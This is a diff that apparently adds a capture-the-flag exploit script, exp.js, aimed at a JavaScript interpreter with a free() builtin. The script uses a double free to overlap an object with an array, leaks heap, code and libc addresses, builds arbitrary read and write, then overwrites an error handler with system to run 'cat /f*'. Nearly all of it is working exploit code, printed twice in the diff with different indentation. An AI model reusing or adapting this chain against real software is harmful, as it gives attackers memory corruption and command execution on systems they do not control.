dkdna · October 16, 2022 03:46
diff --git a/exp.js b/exp.js
 /*
 tl;dr: 
 Double free an object (a), cause a JsObject (d) to overlap with a non-sparse array (c)
 Use this to read addresses as strings, convert back to integers
 Use shrstr in JsValue to overwrite array pointer for arbitrary r/w
 */

 function hex(x) {
    return "0x" + x.toString(16)
 }

 function tohex(x) {
    var val = ""
    for(var i = 0; i < x.length; i++)
        val += x.charCodeAt(i).toString(16)
    return val
 }

 function readhex(str) {
    var encoded = encodeURI(str)
    var val = ""
    var i = 0
    while(i < encoded.length) {
        if(encoded[i] == "%") {
            val += encoded.substring(i+1, i+3)
            i += 3
        } 
        else {
            val += tohex(encoded[i])
            i += 1
        }
    }
    return val
 }

 function u64(str) {
    var val = readhex(str);
    var res = ""
    for(var i = val.length - 2; i >= 0; i -= 2) {
        res += val.substring(i, i+2)
    }
    return parseInt(res, 16)
 }

 function p64(int) {
    var out = ""
    var tmp = int.toString(16)
    var val = 0
    while(tmp.length < 16) {
        tmp = "0" + tmp
    }
    for(var i = 14; i >= 4; i -= 2) {
        val = parseInt(tmp.substring(i, i+2), 16)
        x = val.toString(16)
        if(x.length == 1) {
            out += "%0" + val.toString(16)
        }
        else {
            out += "%" + val.toString(16)
        }
    }
    out = decodeURI(out)
    return out
 }

 var a = [13.37]
 var b = [13.37]

 free(a)
 free(b)

 // c->obj = b
 // c->obj.arr = a
 var c = [13.37, 13.37, 13.37, 13.37, 13.37]

 free(a)

 // d->obj = a
 // c->obj.arr = d->obj
 var d = [13.37]

 // Leaks
 var tmp = c[3]
 var heap_leak = u64(tmp)
 var heap = heap_leak - 0x6230
 print("[*] Heap base @ "+hex(heap))

 // Arb r/w (addresses without nulls)
 function read(addr) {
    tmp_str = "aaaaaaaa" + p64(addr)
    c[4] = tmp_str.slice(0, 14)
    tmp = d[0]
    return u64(tmp)
 }

 function write(addr, val) {
    tmp_str = "aaaaaaaa" + p64(addr)
    c[4] = tmp_str.slice(0, 14)
    tmp_str_2 = p64(val).slice(0, 6)
    d[0] = tmp_str_2
 }

 function write_str(addr, str) {
    tmp_str = "aaaaaaaa" + p64(addr)
    c[4] = tmp_str.slice(0, 14)
    tmp_str_2 = str.slice(0, 7)
    d[0] = tmp_str_2
 }

 // More leaks
 var code_leak = read(heap + 0x1538)
 var code = code_leak - 0x3aa5d
 print("[*] Code base @ "+hex(code))

 var exit_got = code + 0x4ee48
 var libc_leak = read(exit_got)
 var libc = libc_leak - 0x455f0
 print("[*] Libc base @ "+hex(libc))

 // Overwrite js_defaultreport with system
 var system = libc + 0x50d60
 var exception = heap + 0x2b8
 write(exception, system)

 // Overwrite js_State with arg
 var arg = "cat /f*"
 var js_state = heap + 0x2a0
 write_str(js_state, arg)

 // system("cat /f*")
 a()
	/*
	tl;dr:
	Double free an object (a), cause a JsObject (d) to overlap with a non-sparse array (c)
	Use this to read addresses as strings, convert back to integers
	Use shrstr in JsValue to overwrite array pointer for arbitrary r/w
	*/

	function hex(x) {
	return "0x" + x.toString(16)
	}

	function tohex(x) {
	var val = ""
	for(var i = 0; i < x.length; i++)
	val += x.charCodeAt(i).toString(16)
	return val
	}

	function readhex(str) {
	var encoded = encodeURI(str)
	var val = ""
	var i = 0
	while(i < encoded.length) {
	if(encoded[i] == "%") {
	val += encoded.substring(i+1, i+3)
	i += 3
	}
	else {
	val += tohex(encoded[i])
	i += 1
	}
	}
	return val
	}

	function u64(str) {
	var val = readhex(str);
	var res = ""
	for(var i = val.length - 2; i >= 0; i -= 2) {
	res += val.substring(i, i+2)
	}
	return parseInt(res, 16)
	}

	function p64(int) {
	var out = ""
	var tmp = int.toString(16)
	var val = 0
	while(tmp.length < 16) {
	tmp = "0" + tmp
	}
	for(var i = 14; i >= 4; i -= 2) {
	val = parseInt(tmp.substring(i, i+2), 16)
	x = val.toString(16)
	if(x.length == 1) {
	out += "%0" + val.toString(16)
	}
	else {
	out += "%" + val.toString(16)
	}
	}
	out = decodeURI(out)
	return out
	}

	var a = [13.37]
	var b = [13.37]

	free(a)
	free(b)

	// c->obj = b
	// c->obj.arr = a
	var c = [13.37, 13.37, 13.37, 13.37, 13.37]

	free(a)

	// d->obj = a
	// c->obj.arr = d->obj
	var d = [13.37]

	// Leaks
	var tmp = c[3]
	var heap_leak = u64(tmp)
	var heap = heap_leak - 0x6230
	print("[*] Heap base @ "+hex(heap))

	// Arb r/w (addresses without nulls)
	function read(addr) {
	tmp_str = "aaaaaaaa" + p64(addr)
	c[4] = tmp_str.slice(0, 14)
	tmp = d[0]
	return u64(tmp)
	}

	function write(addr, val) {
	tmp_str = "aaaaaaaa" + p64(addr)
	c[4] = tmp_str.slice(0, 14)
	tmp_str_2 = p64(val).slice(0, 6)
	d[0] = tmp_str_2
	}

	function write_str(addr, str) {
	tmp_str = "aaaaaaaa" + p64(addr)
	c[4] = tmp_str.slice(0, 14)
	tmp_str_2 = str.slice(0, 7)
	d[0] = tmp_str_2
	}

	// More leaks
	var code_leak = read(heap + 0x1538)
	var code = code_leak - 0x3aa5d
	print("[*] Code base @ "+hex(code))

	var exit_got = code + 0x4ee48
	var libc_leak = read(exit_got)
	var libc = libc_leak - 0x455f0
	print("[*] Libc base @ "+hex(libc))

	// Overwrite js_defaultreport with system
	var system = libc + 0x50d60
	var exception = heap + 0x2b8
	write(exception, system)

	// Overwrite js_State with arg
	var arg = "cat /f*"
	var js_state = heap + 0x2a0
	write_str(js_state, arg)

	// system("cat /f*")
	a()